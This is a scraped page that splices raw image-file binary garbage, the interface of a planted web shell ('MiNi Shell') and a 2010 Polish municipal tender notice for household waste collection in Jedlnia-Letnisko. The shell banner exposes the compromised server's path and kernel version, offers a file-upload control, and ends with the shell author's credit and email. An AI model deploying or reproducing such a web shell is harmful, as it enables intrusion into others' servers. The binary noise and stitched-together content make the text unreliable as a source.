JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/286485-N-2010.html

<p class="kh_header"><b>Jedlnia-Letnisko: Świadczenie usługi odbioru odpadów komunalnych na terenie Gminy Jedlnia-Letnisko</b><br>
<b>Numer ogłoszenia: 286485 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Jedlnia Letnisko , ul. Radomska 43, 26-630 Jedlnia-Letnisko, woj. mazowieckie, tel. 048 3848470, faks 048 3848470 w. 222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedlnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbioru odpadów komunalnych na terenie Gminy Jedlnia-Letnisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  Przedmiotem zamówienia jest świadczenie usługi odbioru odpadów komunalnych powstających w:
- zamieszkałych nieruchomościach na terenie Gminy Jedlnia-Letnisko, 
- nieruchomościach stanowiących działki rekreacyjne na terenie Gminy Jedlnia-Letnisko.
II. Świadczenie usługi polegać będzie na:
1. Organizacji selektywnej zbiórki odpadów komunalnych z nieruchomości (rozpoczęcie obsługi od 01.01.2011 r.) i wyposażenie właścicieli nieruchomości w worki i pojemniki spełniające wymagania higieniczno-sanitarne z podziałem na:
a. odpady suche (opakowaniowe) o kodzie 15 01 06 - w tym m.in.: opakowania szklane, PET-y, folie, plastiki, papier, tekturę, kartony po napojach, tekstylia, drewno, metal), - gromadzone w workach, z częstotliwością opróżniania co cztery tygodnie. Wykonawca ma obowiązek dostarczyć do każdej nieruchomości dwa worki na odpady opakowaniowe, w kolejnych miesiącach na wymianę.
b. odpady mokre o kodzie 20 03 01- zmieszane inne odpady komunalne - gromadzone w pojemnikach, z częstotliwością opróżniania co cztery tygodnie. Wykonawca ma obowiązek dostarczyć do każdej nieruchomości pojemnik o pojemności: 120 l do nieruchomości, w których zamieszkuje do 3 osób włącznie oraz 240 l do nieruchomości zamieszkiwanych przez 4 osoby i więcej.
c. odpady wielkogabarytowe - wystawione przez mieszkańców, w tym m.in.: stare meble, wózki dziecięce, sprzęt gospodarstwa domowego, deski, materace, opony itp. -z częstotliwością odbioru jeden  raz na pół roku,
d. odpady niebezpieczne - wystawione przez mieszkańców, w tym m.in.: akumulatory, świetlówki, resztki farb, lakierów, rozpuszczalników, środków do impregnacji drewna, olejów mineralnych i syntetycznych, benzyn, leków, opakowania po środkach ochrony roślin i nawozach, opakowania po aerozolach - z częstotliwością odbioru jeden raz na rok, 
e. baterie - odebrane po zgłoszeniu przez Zamawiającego, gromadzone w pojemnikach dostarczonych przez Wykonawcę do szkół na terenie gminy i Urzędu Gminy,
f. odpady pochodzące ze zużytego sprzętu elektrycznego i elektronicznego - wystawione przez mieszkańców, z częstotliwością odbioru jeden raz na rok,
	
UWAGA: przez nieruchomość należy rozumieć, zgodnie z art. 46 § 1 Kodeksu Cywilnego, część powierzchni ziemi stanowiącą odrębny przedmiot własności, jak również budynki trwale związane z gruntem lub część takich budynków.

2. Organizacji selektywnej zbiórki odpadów komunalnych z nieruchomości stanowiących działki rekreacyjne w okresie od czerwca (włącznie) do września (włącznie) i wyposażeniu tych nieruchomości w worki spełniające wymagania higieniczno-sanitarne z podziałem na:
a. odpady suche (opakowaniowe) o kodzie 15 01 06 - w tym m.in.: opakowania szklane, PET-y, folie, plastiki, papier, tekturę, kartony po napojach, tekstylia, drewno, metal - gromadzone w jednym worku o pojemności 120 l, dostarczonym przez Wykonawcę, z częstotliwością opróżniania co cztery tygodnie. 
b. odpady mokre o kodzie 20 03 01 - zmieszane inne odpady komunalne - gromadzone w jednym czarnym worku o pojemności 120 l, dostarczonym przez Wykonawcę, 
z częstotliwością opróżniania co cztery tygodnie,

3. Wykonawca opracuje harmonogram wywozu odpadów komunalnych (mokrych, suchych, wielkogabarytowych, niebezpiecznych, baterii i pochodzących ze zużytego sprzętu elektrycznego i elektronicznego) w terminie 30 dni od daty podpisania umowy 
z uwzględnieniem zasad określonych w pkt. 1. 
Po akceptacji w/w harmonogramów przez Zamawiającego, Wykonawca powiadomi o nich właścicieli (współwłaścicieli, zarządców, użytkowników) nieruchomości.

4. Wykonawca jednorazowo opracuje ulotki informacyjno-edukacyjne w ilości min. 4000 szt., które będą obrazowały w możliwie największym stopniu selekcję odpadów na: suche, mokre, wielkogabarytowe, niebezpieczne, zsee. Wykonawca dostarczy ulotki do każdej nieruchomości najpóźniej w dniu rozpoczęcia obsługi oraz poda do publicznej wiadomości poprzez: wywieszenie na tablicach ogłoszeń w sołectwach i wyłożenie w Urzędzie Gminy 
w Jedlni-Letnisko.

5. W trakcie realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:
a) comiesięcznego dostarczania wraz z fakturą VAT wykazu obsługiwanych nieruchomości 
z podaniem informacji o pojemności dostarczonych do każdej nieruchomości pojemników, 
w celu weryfikacji ilości nieruchomości objętych przedmiotem zamówienia oraz objęcie wszystkich nieruchomości obsługą,
b) poddania unieszkodliwianiu i odzyskowi odpadów komunalnych zmieszanych odebranych od właścicieli nieruchomości w instalacjach utylizacji odpadów komunalnych (składowisko odpadów innych niż niebezpieczne i obojętne oraz Zakład Utylizacji Odpadów Komunalnych) zarządzanej przez PPUH RADKOM Sp. z o. o. w Radomiu ul. Witosa 76 lub innych wymienionych w Wojewódzkim Planie Gospodarki Odpadami, zapewniających potwierdzenie redukcji odpadów biodegradowalnych i poziomów odzysku w momencie powstawania obowiązku. Odpady niebezpieczne i zużyty sprzęt elektryczny i elektroniczny należy przekazywać do zakładu przetwarzania wpisanego do rejestru Głównego Inspektora Ochrony Środowiska w Warszawie,
c) utrzymania użytkowanych bezpylnych pojazdów specjalistycznych w dobrym stanie technicznym, właściwie oznakowanych w ilości niezbędnej do należytego wykonania zamówienia, lecz nie mniej niż 4 pojazdy, w tym 1 pojazd przystosowany do wjazdu 
w wąskie uliczki o szerokości do 3 m,
d) utrzymywania pojemników we właściwym stanie technicznym oraz należytego ich oznakowania poprzez zamieszczenie nazwy i adresu (logo) firmy,
e) zachowania właściwego stanu sanitarnego użytkowanych pojazdów a także pojemników 
i kontenerów służących do gromadzenia odpadów (mycie, dezynfekcja sprzętu winno odbywać się w warunkach spełniających wymagania z zakresu ochrony środowiska i ochrony sanitarnej). Jeżeli w opinii Zamawiającego lub jego przedstawiciela stan sanitarny użytkowanego sprzętu (w tym czystość zewnętrzna pojazdów, pojemników, kontenerów) nie jest właściwa, Wykonawca zastosuje się do wydanych przez Zamawiającego w tym zakresie zaleceń,
f) wymiany uszkodzonych i zużytych pojemników na sprawne i spełniające wymogi higieniczno-sanitarne oraz bieżące ich uzupełnianie w terminie 5 dni roboczych od dnia otrzymania od Zamawiającego wezwania wystawionego za pośrednictwem faksu 
o konieczności wymiany. W przypadku nie zachowania tego terminu, Zamawiający zastrzega sobie prawo do naliczenia kary umownej określonej w § 10 ust. 1 lit. b umowy i potrącenia jej 
z najbliższej faktury,
g) wykonania usługi w sposób rozsądny i fachowy, nie powodujący żadnych niepotrzebnych przeszkód i niedogodności dla społeczeństwa,
h) zabierania odpadów nie mieszczących się w zapełnionych pojemnikach i workach, wystawionych obok.
i) odbierania i transportowania odpadów pojazdami bezpylnymi i kontenerowymi, zgodnie 
z przepisami art. 61 ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. 
z 2005r. Nr 108 poz. 908 z późn. zm.), ze szczególnym uwzględnieniem:
- zabezpieczenia przewożonych odpadów przed wysypaniem na drogę 
- zabezpieczenie przed wydzielaniem odrażającej woni,
- wąskich, utrudnionych dojazdów do posesji.
j) prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z art. 36 ustawy z dnia 27 kwietnia 20001r. o odpadach (Dz.U. Nr. 62 poz. 628 z późn. zm.).
k) przestrzegania w swoim zakresie obowiązującej uchwały Rady Gminy Jedlnia-Letnisko 
w sprawie uchwalenia Regulaminu utrzymania porządku i czystości na terenie Gminy Jedlnia-Letnisko podjętej na podstawie art. 4 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. Nr 132 poz. 622 z póź. zm. ).
l) przedkładania Zamawiającemu w terminie do dnia 15 miesiąca następującego po upływie każdego kwartału, zestawień kwartalnych dotyczących realizowanej umowy w zakresie ilości zebranych odpadów z rozbiciem na poszczególne grupy.
ł) przyjmowania i rozpatrywania reklamacji związanych z prowadzoną przez siebie działalnością w zakresie wywozu nieczystości oraz terminowego i starannego świadczenia usług po rozpatrzeniu reklamacji.

III. W okresie realizacji przedmiotu zamówienia, Zamawiający przewiduje, że: 
1. Przyjęta do przygotowania oferty liczba nieruchomości na terenie gminy wynosić będzie:
- 1405 ? 5 % - nieruchomości zamieszkałe przez cały rok przez liczbę nieprzekraczającą 
3 osób,
- 1649 ? 5 % - nieruchomości zamieszkałe przez cały rok przez liczbę 4 osób i więcej,
- 600 ? 5 % - nieruchomości stanowiące działki rekreacyjne zamieszkiwane w okresie od czerwca (włącznie) do września (włącznie), z tym zastrzeżeniem, że liczba ta zostanie zweryfikowana i ustalona przez Wykonawcę w okresie wykonywania przedmiotu umowy. 
2. Liczba mieszkańców Gminy Jedlnia-Letnisko: 12000 osób ? 5%
3. Przewidywana ilość odpadów komunalnych powstających w gospodarstwach domowych na posesjach z terenu gminy Jedlnia-Letnisko w stosunku rocznym wynosić będzie: ok 1200 Mg.
4. Zamawiający zastrzega sobie prawo żądania ustawienia w wybranych zbiorczych punktach zbiórki odpadów komunalnych kontenerów o pojemności 1,1 - 7 m3..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające przewidywane przez Zamawiającego mogą wynosić:
- 1405 + 10 % - nieruchomości zamieszkałe przez cały rok przez liczbę nieprzekraczającą 3 osób,
- 1649 + 10 % - nieruchomości zamieszkałe przez cały rok przez liczbę 4 osób i więcej,
- 600 + 10 % - nieruchomości stanowiące działki rekreacyjne zamieszkiwane w okresie od czerwca (włącznie) do września (włącznie), z tym zastrzeżeniem, że liczba ta zostanie zweryfikowana i ustalona przez Wykonawcę w okresie wykonywania przedmiotu umowy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów dołączonych do oferty potwierdzających:
-  posiadanie zezwolenia na prowadzenie, na terenie gminy Jedlnia-Letnisko, działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, 
- posiadanie zezwolenia na prowadzenie działalności w zakresie transportu odpadów niebezpiecznych;
- posiadanie wpisu do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska;
- posiadanie umów odbioru odpadów komunalnych wytwarzanych na terenie gminy Jedlnia-Letnisko przez zakład segregacji i odzysku surowców wtórnych z odpadów komunalnych,
- posiadanie umów stwierdzających gotowość odbioru odpadów niebezpiecznych przez instalacje unieszkodliwiające te odpady i zużytego sprzętu elektrycznego i elektronicznego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów dołączonych do oferty potwierdzających:
-  posiadanie co najmniej jednorocznego doświadczenia Wykonawcy w świadczeniu usługi w zakresie organizacji kompleksowych systemów odbioru odpadów komunalnych z obszarów zamieszkałych przez co najmniej 10.000 mieszkańców. Zamawiający uzna spełnienie tego warunku w przypadku wykazania przez wykonawcę realizacji usług w okresie ostatniego roku, na podstawie minimum jednej umowy (ewentualnie wystawionych referencji, z których wynikało będzie spełnienie w/w warunku) w zakresie odbioru odpadów komunalnych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów dołączonych do oferty potwierdzających:
- posiadanie odpowiedniej ilości pojazdów specjalistycznych bezpylnych, spełniających wymagania techniczne określone przepisami ustawy Prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości niezbędnej, lecz nie mniej niż trzy pojazdy, do należytego wykonania zamówienia (Zamawiający zwraca uwagę na bardzo wąskie, ograniczone krawężnikami i chodnikami dojazdy dla pojazdów).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie dokumentów dołączonych do oferty potwierdzających:
- dysponowanie osobami niezbędnymi i uprawnionymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- zezwolenie na prowadzenie, na terenie gminy Jedlnia-Letnisko, działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,
- zezwolenie na prowadzenie działalności w zakresie transportu odpadów niebezpiecznych;
- zawiadomienie Głównego Inspektora Ochrony Środowiska o nadanym numerze rejestrowym, dla podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny
- umowę lub pisemne zapewnienie odbioru odpadów komunalnych wytwarzanych na terenie gminy Jedlnia-Letnisko przez zakład segregacji i odzysku surowców wtórnych z odpadów komunalnych,
- umowę(y) lub pisemne zapewnienie(a) stwierdzające gotowość odbioru odpadów niebezpiecznych przez instalacje unieszkodliwiające te odpady i zużytego sprzętu elektrycznego i elektronicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>nie należy przedkładać oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jedlnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jedlni Letnisko ul. Radomska 43  26-630 Jedlnia Letnisko..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2010 godzina 10:00, miejsce: Urząd Gminy w Jedlni Letnisko ul. Radomska 43  26-630 Jedlnia Letnisko pok. 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com